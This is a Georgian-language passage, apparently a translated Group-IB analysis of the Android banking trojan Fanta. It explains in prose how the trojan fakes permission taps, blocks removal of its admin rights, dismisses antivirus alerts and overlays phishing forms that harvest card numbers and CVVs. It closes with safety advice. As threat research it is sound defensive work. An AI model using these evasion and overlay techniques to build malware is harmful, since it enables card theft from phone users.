  • Dr.Web Security Space Life
  • Dr.Web მობილური მართვის ცენტრი
  • ანტივირუსული და მობილური უსაფრთხოება
  • Kaspersky Internet Security: ანტივირუსი და დაცვა
  • კასპერსკის ბატარეის ხანგრძლივობა: დამზოგავი და გამაძლიერებელი
  • Kaspersky Endpoint Security - დაცვა და მართვა
  • AVG ანტივირუსული უფასო 2019 - დაცვა Android-ისთვის
  • ანტივირუსული Android
  • Norton Mobile Security და ანტივირუსი
  • ანტივირუსი, firewall, VPN, მობილური უსაფრთხოება
  • მობილური უსაფრთხოება: ანტივირუსი, VPN, ქურდობის საწინააღმდეგო
  • ანტივირუსი ანდროიდისთვის

• თუ მოკლე ნომერზე SMS შეტყობინების გაგზავნისას ნებართვა მოითხოვება, Fanta სიმულაციას უკეთებს ჩამრთველ ველზე დაწკაპუნებას დაიმახსოვრე არჩევანი და ღილაკი გაგზავნა.
• როდესაც ცდილობთ ტროას ადმინისტრატორის უფლებების წართმევას, ის ბლოკავს ტელეფონის ეკრანს.
• ხელს უშლის ახალი ადმინისტრატორების დამატებას.
• თუ ანტივირუსული აპლიკაცია dr.web აღმოაჩინა საფრთხე, Fanta ახდენს ღილაკის დაჭერის სიმულაციას იგნორირება.
• ტროას სიმულაცია მოაქვს უკან და მთავარი ღილაკების დაჭერას, თუ მოვლენა გენერირდება აპლიკაციის მიერ Samsung მოწყობილობის მოვლა.
• Fanta ქმნის ფიშინგ ფანჯრებს საბანკო ბარათების შესახებ ინფორმაციის შეყვანის ფორმებით, თუ აპლიკაციის გაშვება 30-მდე სხვადასხვა ინტერნეტ სერვისის სიიდან. მათ შორის: AliExpress, Booking, Avito, Google Play Market Component, Pandao, Drome Auto და ა.შ.
  

  ფიშინგის ფორმები

  Fanta აანალიზებს რომელი აპლიკაციები მუშაობს ინფიცირებულ მოწყობილობაზე. თუ ინტერესის აპლიკაცია გახსნილია, ტროას აჩვენებს ფიშინგის ფანჯარას ყველა დანარჩენზე, რომელიც წარმოადგენს საბანკო ბარათის შესახებ ინფორმაციის შეყვანის ფორმას. მომხმარებელმა უნდა შეიყვანოს შემდეგი მონაცემები:

  • Ბარათის ნომერი
  • ბარათის ვადის გასვლის თარიღი
  • CVV
  • ბარათის მფლობელის სახელი (არა ყველა ბანკისთვის)

  გაშვებული აპლიკაციიდან გამომდინარე, ნაჩვენები იქნება ფიშინგის სხვადასხვა ფანჯარა. ქვემოთ მოცემულია ზოგიერთი მათგანის მაგალითები:

  ალიექსპრესი:

  
  ავიტო:

  
  ზოგიერთი სხვა აპლიკაციისთვის, როგორიცაა Google Play Market, Aviasales, Pandao, Booking, Trivago:
  

  როგორ იყო სინამდვილეში
  

  საბედნიეროდ, პირი, რომელმაც მიიღო სტატიის დასაწყისში აღწერილი SMS შეტყობინება, აღმოჩნდა კიბერუსაფრთხოების სპეციალისტი. მაშასადამე, რეალური, არარეჟისორული ვერსია განსხვავდება ადრე ნათქვამისგან: პირმა მიიღო საინტერესო SMS, რის შემდეგაც იგი გადასცა Group-IB Threat Hunting Intelligence-ის გუნდს. თავდასხმის შედეგი არის ეს სტატია. ბედნიერი დასასრული, არა? თუმცა, ყველა ამბავი ასე კარგად არ მთავრდება და ისე, რომ თქვენი რეჟისორის ჭრილს არ ჰგავდეს ფულის დაკარგვით, უმეტეს შემთხვევაში საკმარისია დაიცვან შემდეგი გრძელი აღწერილი წესები:

  • არ დააინსტალიროთ აპები თქვენი Android მობილური მოწყობილობისთვის Google Play-ს გარდა სხვა წყაროდან
  • აპლიკაციის დაყენებისას განსაკუთრებული ყურადღება მიაქციეთ აპლიკაციის მიერ მოთხოვნილ უფლებებს
  • ყურადღება მიაქციეთ ატვირთული ფაილების გაფართოებებს
  • რეგულარულად დააინსტალირეთ Android OS განახლებები
  • არ ეწვიოთ საეჭვო რესურსებს და არ გადმოწეროთ ფაილები იქიდან
  • არ დააჭიროთ SMS შეტყობინებებში მიღებულ ბმულებს.

წყარო: www.habr.com